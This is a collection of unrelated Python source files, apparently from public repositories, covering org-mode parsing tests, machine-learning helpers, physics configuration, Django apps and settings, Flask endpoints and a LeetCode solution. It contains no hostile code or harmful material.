dates. ORG_TMPL = """ * PROJECT Aggregator ** TODO This is open task :OPEN_TASK: SCHEDULED: <{{ today }}> ** TODO Past task :TAG1: SCHEDULED: <{{ yesterday }}> ** DONE Already done :DEADLINE: DEADLINE: <{{ today }}> ** [#B] Appointment :APP: <{{ accurate }}> ** Whole day event :WHOLE_DAY: <{{ today }}> ** Inactive date :INACTIVE: [{{ accurate }}] ** [#A] Ranged :RANGE: <{{ yesterday }}>--<{{ today }}> """ DAYTIME = '%Y-%m-%d %a %H:%M' DAY = '%Y-%m-%d %a' # For testing org helpers ORG_CONFIG = { 'files': [], 'files_re': None, 'base': None, 'todos_open': ['TODO'], 'todos_closed': ['DONE', 'CANCELLED'], # How grouping entry is marked - which groups TODOs and DONEs. 'project': 'PROJECT', 'resilient': False, 'timezone': pytz.timezone('UTC'), } class TestOrg(unittest.TestCase): "Test org mode reading" def setUp(self): self.utc = pytz.timezone('UTC') today = dt.datetime.now().replace(hour=random.randint(6, 10), minute=random.randint(0, 59)) today = self.utc.localize(today) yesterday = today - dt.timedelta(days=1) tomorrow = today + dt.timedelta(days=1) accurate = today + dt.timedelta(hours=3) context = { 'today': today.strftime(DAY), 'yesterday': yesterday.strftime(DAY), 'tomorrow': tomorrow.strftime(DAY), 'accurate': accurate.strftime(DAYTIME), } tmpl = jinja2.Template(ORG_TMPL) self.rendered_org = tmpl.render(context) self.org_file = io.StringIO(self.rendered_org) self.db = orgnode.makelist(self.org_file, todo_default=['TODO', 'DONE', 'PROJECT']) def test_orgnode(self): "Test reading ORG using orgnode" self.assertIn('OPEN_TASK', self.db[1].tags) self.assertEqual(self.db[1].headline, 'This is open task') def test_conversion(self): "Test orgnode to events conversion" events = [ helpers.orgnode_to_event(node, ORG_CONFIG) for node in self.db ] # If something fails intermittently - show debug data print(self.rendered_org) # Validate assumptions for event in events: print(event) if 'RANGE' in event.tags: self.assertEqual(event.priority, 'A') self.assertIn(DateType.RANGE, event.date_types) self.assertEqual(event.relevant_date.date_type, DateType.RANGE) if 'OPEN_TASK' in event.tags: self.assertEqual(event.priority, None) self.assertEqual(event.state.name, 'TODO') self.assertTrue(event.state.is_open) self.assertIn(DateType.SCHEDULED, event.date_types) self.assertEqual(event.relevant_date.date_type, DateType.SCHEDULED) if 'DEADLINE' in event.tags: relevant = event.relevant_date self.assertEqual(event.state.name, 'DONE') self.assertFalse(event.state.is_open) self.assertEqual(relevant.date_type, DateType.DEADLINE) self.assertFalse(relevant.appointment) if 'APP' in event.tags: relevant = event.relevant_date self.assertEqual(event.priority, 'B') self.assertTrue(relevant.appointment) self.assertEqual(len(events), 8) import numpy as np from sklearn.model_selection import train_test_split, cross_val_score from sklearn.metrics import accuracy_score from operator import itemgetter class AccuracyValidation(): def __init__(self): self.letters = [ '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z' ] def split_validation(self, model, image_data, target_data, wrong_predictions = False): """ uses the train_test_split method of sklearn cross validation Divides the training data into 75% : 25%. 75% for training 25% for testing The method prints the percentage of correct predictions Parameters: ----------- model: the machine learning model object image_data: 2D Numpy array of the training data with its features target_data: 1D numpy array of the labels wrong_predictions: Boolean (default is False), if true all the wrong predictions will be displayed for further investigation """ img_train, img_test, target_train, target_test = train_test_split(image_data, target_data) model.fit(img_train, target_train) prediction = model.predict(img_test) accuracy = (float(np.sum(prediction == target_test)) / len(target_test)) print str(round(accuracy * 100, 2))+ "% accuracy was recorded" if wrong_predictions: self.print_wrong_predictions(prediction, target_test, img_test, model) def print_wrong_predictions(self, predictions, correct_labels, img_test, model): """ prints all the wrong predictions made by the model """ print 'Here are the wrong predictions' print 'Prediction\tCorrect Label' print '------------------------------' for i in range(len(predictions)): if predictions[i] != correct_labels[i]: probabilities = model.predict_proba(img_test[i].reshape(1, -1)) print 'Predicted: '+predictions[i]+'\t\t Actual:'+correct_labels[i] print 'Probability Distribution' self.top_predictions(probabilities) print '------------------------' print '------------------------------' def cross_validation(self, model, num_of_fold, train_data, train_label): accuracy_result = cross_val_score(model, train_data, train_label, cv = num_of_fold) print "Cross Validation Result for "+str(num_of_fold)+"-fold" print accuracy_result * 100 def top_predictions(self, probabilities_prediction): predictions = probabilities_prediction.reshape(-1).tolist() predictions_label = [] for index in range(len(predictions)): predictions_label.append((self.letters[index], predictions[index])) predictions_label = sorted(predictions_label, key=itemgetter(1), reverse=True) print predictions_label[:5]<filename>telemetry/visualization/fusion_visualization_recorder.py import os from typing import List import numpy as np from open3d.visualization import Visualizer import open3d as o3d import cv2 from multiprocessing import cpu_count class FusionVisualizationRecorder(): def __init__(self, output_video_path, front=[0, 0, -1], lookat=[0, 0, 1.5], up=[0, -1.0, 0], zoom=0.7): self.visualizer = Visualizer() self.writer = None self.front = front self.lookat = lookat self.up = up self.zoom = zoom self.output_video_path = output_video_path # cv2.VideoWriter_fourcc('X', '2', '6', '4') fourcc = cv2.VideoWriter_fourcc(*"mp4v") # fourcc = cv2.VideoWriter_fourcc(*"x264") self.writer = cv2.VideoWriter(self.output_video_path, fourcc, 30, (1920, 1080), True) self.writer.set(cv2.VIDEOWRITER_PROP_NSTRIPES, cpu_count()) self.visualizer.create_window("Fusion output frame capture") def __del__(self): self.visualizer.destroy_window() if self.writer is not None: self.writer.release() def capture_frame(self, geometry: List[o3d.geometry.Geometry3D]) -> None: for item in geometry: self.visualizer.add_geometry(item) self.visualizer.update_geometry(item) view_controller: o3d.visualization.ViewControl = self.visualizer.get_view_control() view_controller.set_front(self.front) view_controller.set_lookat(self.lookat) view_controller.set_up(self.up) view_controller.set_zoom(self.zoom) self.visualizer.poll_events() self.visualizer.update_renderer() frame_image = (np.array(self.visualizer.capture_screen_float_buffer()) * 255).astype(np.uint8) self.writer.write(frame_image) self.visualizer.clear_geometries() <reponame>NTrevisani/cmssw import FWCore.ParameterSet.Config as cms process = cms.Process("TEST") process.source = cms.Source("PoolSource", fileNames = cms.untracked.vstring( "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/FAF8A711-C297-DE11-A00E-001731AF66AF.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/FAB8A245-D996-DE11-A866-003048678A6A.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F8D6CB8E-CD96-DE11-A8D2-003048678FFA.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F8349AAD-C297-DE11-99E3-0030486792BA.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F8251242-DA96-DE11-B26B-003048678FC6.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F49C816C-D796-DE11-AC34-003048D15DDA.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F288C73C-C297-DE11-9F00-001731AF684D.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F0BBFDE1-D496-DE11-8E1B-003048678FE6.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/EE1592A7-C297-DE11-8679-0030486792AC.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/E2938851-CF96-DE11-8330-0017312B5651.root", )) process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(100)) process.StandAloneTest = cms.EDAnalyzer("StandAloneTest", Tracks = cms.InputTag("")) process.load("Configuration.StandardSequences.MagneticField_cff") process.load("Geometry.CMSCommonData.cmsIdealGeometryXML_cfi") process.load("Geometry.CommonDetUnit.bareGlobalTrackingGeometry_cfi") process.load("Geometry.MuonNumbering.muonNumberingInitialization_cfi") process.load("Geometry.DTGeometry.dtGeometry_cfi") process.load("Geometry.CSCGeometry.cscGeometry_cfi") process.load("Geometry.RPCGeometry.rpcGeometry_cfi") process.load("Geometry.TrackerNumberingBuilder.trackerNumberingGeometry_cfi") process.load("Geometry.TrackerGeometryBuilder.trackerGeometry_cfi") ### for cosmic rays (only use one) process.load("TrackingTools.TrackRefitter.globalCosmicMuonTrajectories_cff") process.TrackRefitter = process.globalCosmicMuons.clone() process.TrackRefitter.Tracks = cms.InputTag("globalCosmicMuons") process.StandAloneTest.Tracks = cms.InputTag("globalCosmicMuons") ### for collisions (only use one) # process.load("TrackingTools.TrackRefitter.globalMuonTrajectories_cff") # process.TrackRefitter = process.globalCosmicMuons.clone() # process.TrackRefitter.Tracks = cms.InputTag("globalMuons") # process.StandAloneTest.Tracks = cms.InputTag("globalMuons") process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff") process.GlobalTag.globaltag = cms.string("CRAFT0831X_V1::All") process.load("CondCore.DBCommon.CondDBSetup_cfi") ### for assigning a custom muon alignment # process.MuonAlignment = cms.ESSource("PoolDBESSource", # process.CondDBSetup, # connect = cms.string("sqlite_file:customMuonAlignment.db"), # toGet = cms.VPSet(cms.PSet(record = cms.string("DTAlignmentRcd"), tag = cms.string("DTAlignmentRcd")), # cms.PSet(record = cms.string("CSCAlignmentRcd"), tag = cms.string("CSCAlignmentRcd")))) # process.es_prefer_MuonAlignment = cms.ESPrefer("PoolDBESSource", "MuonAlignment") ### it is important to refit with zero weights ("infinite" APEs) process.MuonAlignmentErrorsExtended = cms.ESSource("PoolDBESSource", process.CondDBSetup, connect = cms.string("sqlite_file:APE1000cm.db"), toGet = cms.VPSet(cms.PSet(record = cms.string("DTAlignmentErrorExtendedRcd"), tag = cms.string("DTAlignmentErrorExtendedRcd")), cms.PSet(record = cms.string("CSCAlignmentErrorExtendedRcd"), tag = cms.string("CSCAlignmentErrorExtendedRcd")))) process.es_prefer_MuonAlignmentErrorsExtended = cms.ESPrefer("PoolDBESSource", "MuonAlignmentErrorsExtended") process.TFileService = cms.Service("TFileService", fileName = cms.string("standAloneTest.root")) process.Path = cms.Path(process.TrackRefitter * process.StandAloneTest) import json, os from keras.models import Sequential, Model from keras.layers import Dense, GRU, Input, Dropout, Bidirectional import keras.backend as K from keras import optimizers with open(os.path.join(os.path.dirname(__file__), '../config.json')) as f: CONF = json.load(f) INPUT_SIZE = CONF["train"]["input_size"] FRAME_SIZE = CONF["train"]["frame_size"] def set_frame_size(size): global FRAME_SIZE FRAME_SIZE = size def set_input_size(size): global INPUT_SIZE INPUT_SIZE = size def binary_accuracy(y_true, y_pred): return K.mean(K.equal(K.round(y_true), K.round(y_pred)), axis=-1) def get_bidirectional_model(): model = Sequential() _input = Input(shape=(FRAME_SIZE, INPUT_SIZE)) gru_1 = Bidirectional(GRU(60, kernel_initializer='random_uniform', return_sequences=True))(_input) dropout_gru_1 = Dropout(0.2)(gru_1) gru_2 = Bidirectional(GRU(60, kernel_initializer='random_uniform', return_sequences=True))(dropout_gru_1) dropout_gru_2 = Dropout(0.2)(gru_2) gru_3 = GRU(120, kernel_initializer='random_uniform', return_sequences=False)(dropout_gru_2) dense_1 = Dense(INPUT_SIZE, kernel_initializer='random_uniform', activation='hard_sigmoid')(gru_3) adam = optimizers.Adam(lr=0.001) model = Model(inputs=_input, outputs=dense_1) model.compile(loss='mean_squared_error', optimizer=adam, metrics=[binary_accuracy, 'mae']) return model <reponame>PvrpleBlvck/Python_Learning_Journey import requests import pandas as pd headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'} def get_screener(version): screen = requests.get(f'https://finviz.com/screener.ashx?v={version}&f=ind_consumerelectronics,sec_technology', headers = headers).text tables = pd.read_html(screen) tables = tables[-2] tables.columns = tables.iloc[0] tables = tables[1:] return tables tables111 = get_screener('111') tables161 = get_screener('161') tables121 = get_screener('121') consolidatedtables = pd.merge(tables111,tables161,how='outer',left_on='Ticker',right_on='Ticker') consolidatedtables = pd.merge(consolidatedtables,tables121,how='outer',left_on='Ticker',right_on='Ticker') consolidatedtables.to_csv('test.csv') print(consolidatedtables)# Generated by Django 3.0 on 2020-05-16 07:11 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("grades", "0019_auto_20200516_0642"), ] operations = [ migrations.AlterField( model_name="course", name="taught_from", field=models.IntegerField(default=0), ), ] ''' file goodwin_main.py @author <NAME>, <NAME> @copyright Copyright © UCLouvain 2020 multiflap is a Python tool for finding periodic orbits and assess their stability via the Floquet multipliers. Copyright <2020> <Université catholique de Louvain (UCLouvain), Belgique> List of the contributors to the development of multiflap, Description and complete License: see LICENSE and NOTICE files. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import numpy as np from odes.goodwin_model import GoodwinModel from ms_package.rk_integrator import rk4 from ms_package.multiple_shooting_period import MultipleShootingPeriod from matplotlib.ticker import FormatStrFormatter from scipy.integrate import odeint import matplotlib.pyplot as plt from ms_package.lma_solver_period import SolverPeriod import matplotlib as mpl x = [0.1, 1, 1] time_array = np.linspace(0, 250, 90000) mymodel = GoodwinModel() ms_obj = MultipleShootingPeriod(x, M=40, period_guess= 23., t_steps=200, model=mymodel, integrator='odeint', option_jacobian='numerical') mysol = SolverPeriod(ms_obj = ms_obj).lma() jac = mysol[4] eigenvalues, eigenvectors = np.linalg.eig(jac) sol_array = mysol[3].space sol_time = mysol[3].time period = sol_time[-1] ssp_pert = odeint(GoodwinModel(perturbation=True).dynamics, sol_array[-1,:], time_array) ssp_unpert = odeint(GoodwinModel(perturbation=False).dynamics, sol_array[-1,:], time_array) pert = GoodwinModel().square(time_array, amp=0.05, t_0 = 150) fig1 = plt.figure(figsize=(12,8)) ax1 = fig1.add_subplot(312) ax1.plot(time_array, ssp_pert[:,0], label='x') ax1.plot(time_array, ssp_pert[:,1], label='y') ax1.plot(time_array, ssp_pert[:,2], label='z') ax1.legend() ax1.set_ylabel('Goodwin variables') ax2 = fig1.add_subplot(311) ax2.plot(time_array, pert) ax2.set_ylabel('Rect perturbation') ax3 = fig1.add_subplot(313) ax3.plot(time_array, ssp_pert[:,0] - ssp_unpert[:,0], label='x_pert - x_unpert') ax3.plot(time_array, ssp_pert[:,1] - ssp_unpert[:,1], label='y_pert - y_unpert') ax3.plot(time_array, ssp_pert[:,2] - ssp_unpert[:,2], label='z_pert - z_unpert') ax3.legend() ax3.set_xlabel('time (h)'); ax3.set_ylabel('pert-unpert') plt.show()<reponame>julianwagle/octopod-spork-react from django.apps import AppConfig from django.utils.translation import gettext_lazy as _ class ProfilesConfig(AppConfig): name = "backend.profiles" verbose_name = _("Profiles") from django.db import models from datetime import date from pgweb.core.models import Organisation class NewsTag(models.Model): urlname = models.CharField(max_length=20, null=False, blank=False, unique=True) name = models.CharField(max_length=32, null=False, blank=False) description = models.CharField(max_length=200, null=False, blank=False) def __str__(self): return self.name class Meta: ordering = ('urlname', ) class NewsArticle(models.Model): org = models.ForeignKey(Organisation, null=False, blank=False, verbose_name="Organisation", help_text="If no organisations are listed, please check the <a href=\"/account/orglist/\">organisation list</a> and contact the organisation manager or <a href=\"mailto:<EMAIL>\"><EMAIL></a> if none are listed.", on_delete=models.CASCADE) approved = models.BooleanField(null=False, blank=False, default=False) date = models.DateField(null=False, blank=False, default=date.today) title = models.CharField(max_length=200, null=False, blank=False) content = models.TextField(null=False, blank=False) tweeted = models.BooleanField(null=False, blank=False, default=False) tags = models.ManyToManyField(NewsTag, blank=False, help_text="Hover mouse over tags to view full description") send_notification = True send_m2m_notification = True markdown_fields = ('content',) def purge_urls(self): yield '/about/news/%s/' % self.pk yield '/about/newsarchive/' yield '/news.rss' yield '/news/.*.rss' # FIXME: when to expire the front page? yield '/$' def __str__(self): return "%s: %s" % (self.date, self.title) def verify_submitter(self, user): return (len(self.org.managers.filter(pk=user.pk)) == 1) def is_migrated(self): if self.org.pk == 0: return True return False @property def displaydate(self): return self.date.strftime("%Y-%m-%d") class Meta: ordering = ('-date',) import os HBP_IDENTITY_SERVICE_URL_V2 = "https://iam.ebrains.eu/auth/realms/hbp/protocol/openid-connect" HBP_COLLAB_SERVICE_URL_V2 = "https://wiki.ebrains.eu/rest/v1/" EBRAINS_IAM_CONF_URL = "https://iam.ebrains.eu/auth/realms/hbp/.well-known/openid-configuration" EBRAINS_IAM_CLIENT_ID = os.environ.get("EBRAINS_IAM_CLIENT_ID") EBRAINS_IAM_SECRET = os.environ.get("EBRAINS_IAM_SECRET") KG_SERVICE_ACCOUNT_CLIENT_ID = os.environ.get("KG_SERVICE_ACCOUNT_CLIENT_ID") KG_SERVICE_ACCOUNT_SECRET = os.environ.get("KG_SERVICE_ACCOUNT_SECRET") SESSIONS_SECRET_KEY = os.environ.get("SESSIONS_SECRET_KEY") BASE_URL = os.environ.get("PROV_API_BASE_URL") KG_CORE_API_HOST = os.environ.get("KG_CORE_API_HOST") ADMIN_GROUP_ID = "computation-curators" from typing import Iterable, List, Tuple from django.core.mail import get_connection, EmailMultiAlternatives from django.template.loader import render_to_string from django.utils.html import strip_tags from .models import Doubles, Season, Singles, ScoreKeepers def send_mass_html_mail(data_tuples: List[Tuple[str, str, str, str, List[str]]], fail_silently=False, user=None, password=<PASSWORD>, connection=None): """ Given a datatuple of (subject, text_content, html_content, from_email, recipient_list), sends each message to each recipient list. Returns the number of emails sent. If from_email is None, the DEFAULT_FROM_EMAIL setting is used. If auth_user and auth_password are set, they're used to log in. If auth_user is None, the EMAIL_HOST_USER setting is used. If auth_password is None, the EMAIL_HOST_PASSWORD setting is used. """ connection = connection or get_connection( username=user, password=password, fail_silently=fail_silently) messages = [] for subject, text, html, from_email, recipient in data_tuples: if len(recipient) > 0: message = EmailMultiAlternatives(subject, text, from_email, recipient) message.attach_alternative(html, 'text/html') messages.append(message) return connection.send_messages(messages) def send_roster_emails(year: int, seasons: Iterable[Season]): data_tuples = [personalize_roster(year, s) for s in seasons] send_mass_html_mail(data_tuples) def personalize_roster(year: int, season: Season) -> Tuple[str, str, str, str, List[str]]: context = {'season': season, 'year': year} html_content = render_to_string('roster_email.html', context) text_content = strip_tags(html_content) return "2021 WWTL Season", text_content, html_content, "<EMAIL>", [ season.player.user.email] def send_match_cards(all_singles: List[Singles], score_keeper: ScoreKeepers): data_tuples = [generate_singles_email(singles, score_keeper) for singles in all_singles if singles.player.player.user.email] send_mass_html_mail(data_tuples) def send_doubles_match_cards(all_doubles: List[Doubles], score_keeper: ScoreKeepers): data_tuples = [generate_doubles_email(doubles, score_keeper) for doubles in all_doubles] send_mass_html_mail(data_tuples) def generate_singles_email(singles: Singles, score_keeper: ScoreKeepers) -> Tuple[str, str, str, str, List[str]]: home_matches = singles.home_matches.all() away_matches = singles.away_matches.all() opponents = [m.away for m in home_matches] + [m.home for m in away_matches] context = {"opponents": opponents, "singles": singles, "score_keeper": score_keeper} html_content = render_to_string('singles_match_card.html', context) text_content = strip_tags(html_content) return "2021 WWTL Match Card", text_content, html_content, \ "<EMAIL>", [singles.player.player.user.email] def generate_doubles_email(doubles: Doubles, score_keeper: ScoreKeepers) -> Tuple[str, str, str, str, List[str]]: home_matches = doubles.home_matches.all() away_matches = doubles.away_matches.all() opponents = [m.away for m in home_matches] + [m.home for m in away_matches] context = {"opponents": opponents, "doubles": doubles, "score_keeper": score_keeper} html_content = render_to_string('doubles_match_card.html', context) text_content = strip_tags(html_content) emails = [player.player.user.email for player in [doubles.playerA, doubles.playerB] if player.player.user.email] return "2021 WWTL Match Card", text_content, html_content, "<EMAIL>", emails from . import mobile_blueprint from flask import render_template, request, flash, redirect, url_for from app import db from models.auth_model import User from models.test_set import TestSet from models.test_result import TestResult from util.web.web_auth import requires_session, csrf_protect from util.router import Router from util.json_helpers import JSON_SUCCESS, JSON_FAILURE from util.rest.rest_auth import requires_user_token import base64 import logging import math from util.jinja.units import KILOBYTES, MEGABYTES, GIGABYTES, BITS @mobile_blueprint.route('test_result/<result_id>/state', methods=['GET']) @requires_user_token() def test_finished(result_id): test_result = TestResult.get_result_by_id(result_id) if not test_result: return JSON_FAILURE(reason="Invalid test result id") return JSON_SUCCESS(state=test_result.state) @mobile_blueprint.route('test_set/<set_id>', methods=['GET']) @requires_user_token() def set_summary(set_id): test_set = TestSet.get_set_by_id(set_id) for aset in test_set.tests: logging.info("Set: %s, %s,", aset.device_name, aset.download_latencies) router = [aset for aset in test_set.tests if aset.device_type == 'router'][0] mobile = [aset for aset in test_set.tests if aset.device_type == 'mobile'][0] tputs = [0] if router.download_throughputs: tputs += router.download_throughputs if router.upload_throughputs: tputs += router.upload_throughputs if mobile.download_throughputs: tputs += mobile.download_throughputs if mobile.upload_throughputs: tputs += mobile.upload_throughputs tput_max = max(tputs) if tput_max > 2**30: tput_units = lambda x: GIGABYTES(BITS(x), 2) tput_units_name = "Gigabits" elif tput_max > 2**20: tput_units = lambda x: MEGABYTES(BITS(x), 2) tput_units_name = "Megabits" else: tput_units = lambda x: KILOBYTES(BITS(x), 2) tput_units_name = "Kilobits" intf_stats = {} # interface_name :: String -> list of downloads ts_d = 0 bytes_d = 0 has_router = False if router.interface_stats: has_router = True for i in router.interface_stats: intf_name = i["intf"] if intf_name not in intf_stats: intf_stats[intf_name] = [] intf_stats[intf_name].append([i["rx_bytes"], i["timestamp"] / 1000.0]) def derivative(lst): # takes [(bytes, timestamp)] -> ([bytes], [timestamp]) ret_bytes = [] ret_ts = [] ts_most = lst[-1][1] for i in range(len(lst)-1): ret_bytes.append((lst[i+1][0] - lst[i][0]) / 1000000.0) ret_ts.append(ts_most - lst[i][1]) return (ret_bytes, ret_ts) (bytes_d, ts_d) = derivative(intf_stats["eth1"]) if tput_max == 0: has_router = False return render_template('set_summary.html', user_token=request.args['user_token'], router=router, mobile=mobile, tput_units=tput_units, tput_units_name=tput_units_name, eth1_ts=ts_d, eth1_bytes=bytes_d, has_router=has_router, ) <reponame>tkragholm/RNAEditor<filename>ui/ResultTab.py<gh_stars>0 from PyQt4 import QtGui from PyQt4.QtCore import QUrl from PyQt4.QtWebKit import QWebView class ResultTab(QWebView): def __init__(self, control, site): super(ResultTab, self).__init__() self.control = control self.site = site self.createMenu() self.createComponents() self.createLayout() self.createConnects() def createMenu(self): pass def createComponents(self): self.load(QUrl(self.site)) def _result_available(self, ok): pass def createLayout(self): pass def createConnects(self): pass if __name__ == '__main__': import sys, os print(os.getcwd()) app = QtGui.QApplication(sys.argv) mainWindow = ResultTab(None, 'http://google.com') mainWindow.show() sys.exit(app.exec_()) <reponame>Aggrathon/CarAiSimulator import tensorflow as tf from model import Session, get_network from communication import Driver from data import VARIABLE_COUNT, IMAGE_DEPTH, IMAGE_HEIGHT, IMAGE_WIDTH def drive(): """ Drive a car, alternating between the networks """ tf.logging.set_verbosity(tf.logging.INFO) imgs = tf.placeholder(tf.float32, [None, IMAGE_WIDTH*IMAGE_HEIGHT*IMAGE_DEPTH]) vars = tf.placeholder(tf.float32, [None, VARIABLE_COUNT]) _, neta, netb = get_network(tf.reshape(imgs, [-1, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_DEPTH]), vars, training=False) with Session(False, False) as sess: with Driver() as driver: def inout(h, v): print("Driving | h: %+.2f v: %+.2f"%(h,v), end='\r') x, v, y, s = driver.drive(h, v) return { imgs: [x], vars: [v] } try: h = 0 v = 1 while True: h, v, _ = sess.session.run(neta.output, feed_dict=inout(h, v))[0] h, v, _ = sess.session.run(netb.output, feed_dict=inout(h, v))[0] except (KeyboardInterrupt, StopIteration): pass if __name__ == "__main__": drive()<filename>tests/cvp/padding.py """Test CVP of 2d zero padding operation.""" from torch.nn import ZeroPad2d from bpexts.cvp.padding import CVPZeroPad2d from .cvp_test import set_up_cvp_tests # hyper-parameters input_size = (2, 3, 4, 5) padding = (2, 1, 3, 4) atol = 1e-7 rtol = 1e-5 num_hvp = 10 def torch_fn(): return ZeroPad2d(padding) def cvp_fn(): return CVPZeroPad2d(padding) for name, test_cls in set_up_cvp_tests( torch_fn, cvp_fn, "CVPZeroPad2d", input_size=input_size, atol=atol, rtol=rtol, num_hvp=num_hvp, ): exec("{} = test_cls".format(name)) del test_cls def cvp_from_torch_fn(): """Create CVPZeroPad2d from ZeroPad2d.""" torch_layer = torch_fn() return CVPZeroPad2d.from_torch(torch_layer) for name, test_cls in set_up_cvp_tests( torch_fn, cvp_from_torch_fn, "CVPZeroPad2dFromTorch", input_size=input_size, atol=atol, rtol=rtol, num_hvp=num_hvp, ): exec("{} = test_cls".format(name)) del test_cls <reponame>AutuanLiu/LeetCode2019 # # @lc app=leetcode id=75 lang=python3 # # [75] Sort Colors # # https://leetcode.com/problems/sort-colors/description/ # # algorithms # Medium (41.62%) # Total Accepted: 306.7K # Total Submissions: 733.7K # Testcase Example: '[2,0,2,1,1,0]' # # Given an array with n objects colored red, white or blue, sort them in-place # so that objects of the same color are adjacent, with the colors in the order # red, white and blue. # # Here, we will use the integers 0, 1, and 2 to represent the color red, white, # and blue respectively. # # Note: You are not suppose to use the library's sort function for this # problem. # # Example: # # # Input: [2,0,2,1,1,0] # Output: [0,0,1,1,2,2] # # Follow up: # # # A rather straight forward solution is a two-pass algorithm using counting # sort. # First, iterate the array counting number of 0's, 1's, and 2's, then overwrite # array with total number of 0's, then 1's and followed by 2's. # Could you come up with a one-pass algorithm using only constant space? # # # class Solution: def sortColors(self, nums: List[int]) -> None: """ Do not return anything, modify nums in-place instead. """ self.sort(nums, 0, len(nums) - 1) # 排序 def partition(self, nums, start, end): """找到分割点的同时进行排序""" i = start - 1 pivot = nums[end] # 使用最后的一个元素作为分割元素 for j in range(start, end): if nums[j] < pivot: i = i + 1 # 如果找到比基准元素小的就交换 nums[i], nums[j] = nums[j], nums[i] # 遍历一遍即以找到基准位置 i+1, 之后填入基准元素 nums[i + 1], nums[end] = nums[end], nums[i + 1] return i + 1 def sort(self, nums, start, end): if start < end: p = self.partition(nums, start, end) # 找到分割位置 self.sort(nums, start, p - 1) # 左半边排序 self.sort(nums, p + 1, end) # 右半边排序 """ Django settings for django_cookbook project. Generated by 'django-admin startproject' using Django 3.1.1. For more information on this file, see https://docs.djangoproject.com/en/3.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.1/ref/settings/ """ import os import json from pathlib import Path from django.core.exceptions import ImproperlyConfigured from ..apps.core.versioning import get_git_change_set_timestamp from django.utils.translation import gettext_lazy as _ PROJECT_NAME = 'django_cookbook' with open(os.path.join(os.path.dirname(__file__), 'secrets.json'), 'r') as f: secrets = json.loads(f.read()) def get_secret(setting): """Get the secret variable or return explicit exception""" try: return secrets[setting] except KeyError: error_msg = f'Set the {setting} environment variable' raise ImproperlyConfigured(error_msg) # Build paths inside the project like this: BASE_DIR / 'subdir'. # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent.parent PROJECT_DIR = Path(__file__).resolve().parent.parent # PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # BASE_DIR = os.path.dirname(PROJECT_DIR) # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', # internal apps 'django_cookbook.apps.magazine', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = PROJECT_NAME + '.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [ os.path.join(PROJECT_DIR, 'templates') ], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = PROJECT_NAME+'.wsgi.application' # Database # https://docs.djangoproject.com/en/3.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', }, # 'mysql': { # 'ENGINE': 'django.db.backends.mysql', # 'NAME': get_secret('DATABASE_NAME'), # 'USER': get_secret('DATABASE_USER'), # 'PASSWORD': get_secret('DATABASE_PASSWORD'), # 'HOST': get_secret('DATABASE_HOST'), # 'PORT': get_secret('DATABASE_PORT'), # 'OPTIONS': { # 'init_command': "SET sql_mode='STRICT_TRANS_TABLES'" # } # }, # 'postgresql': { # 'ENGINE': 'django.db.backends.postgresql_psycopg2', # 'NAME': get_secret('DATABASE_NAME'), # 'USER': get_secret('DATABASE_USER'), # 'PASSWORD': get_secret('DATABASE_PASSWORD'), # 'HOST': get_secret('DATABASE_HOST'), # 'PORT': get_secret('DATABASE_PORT'), # }, } # Password validation # https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators 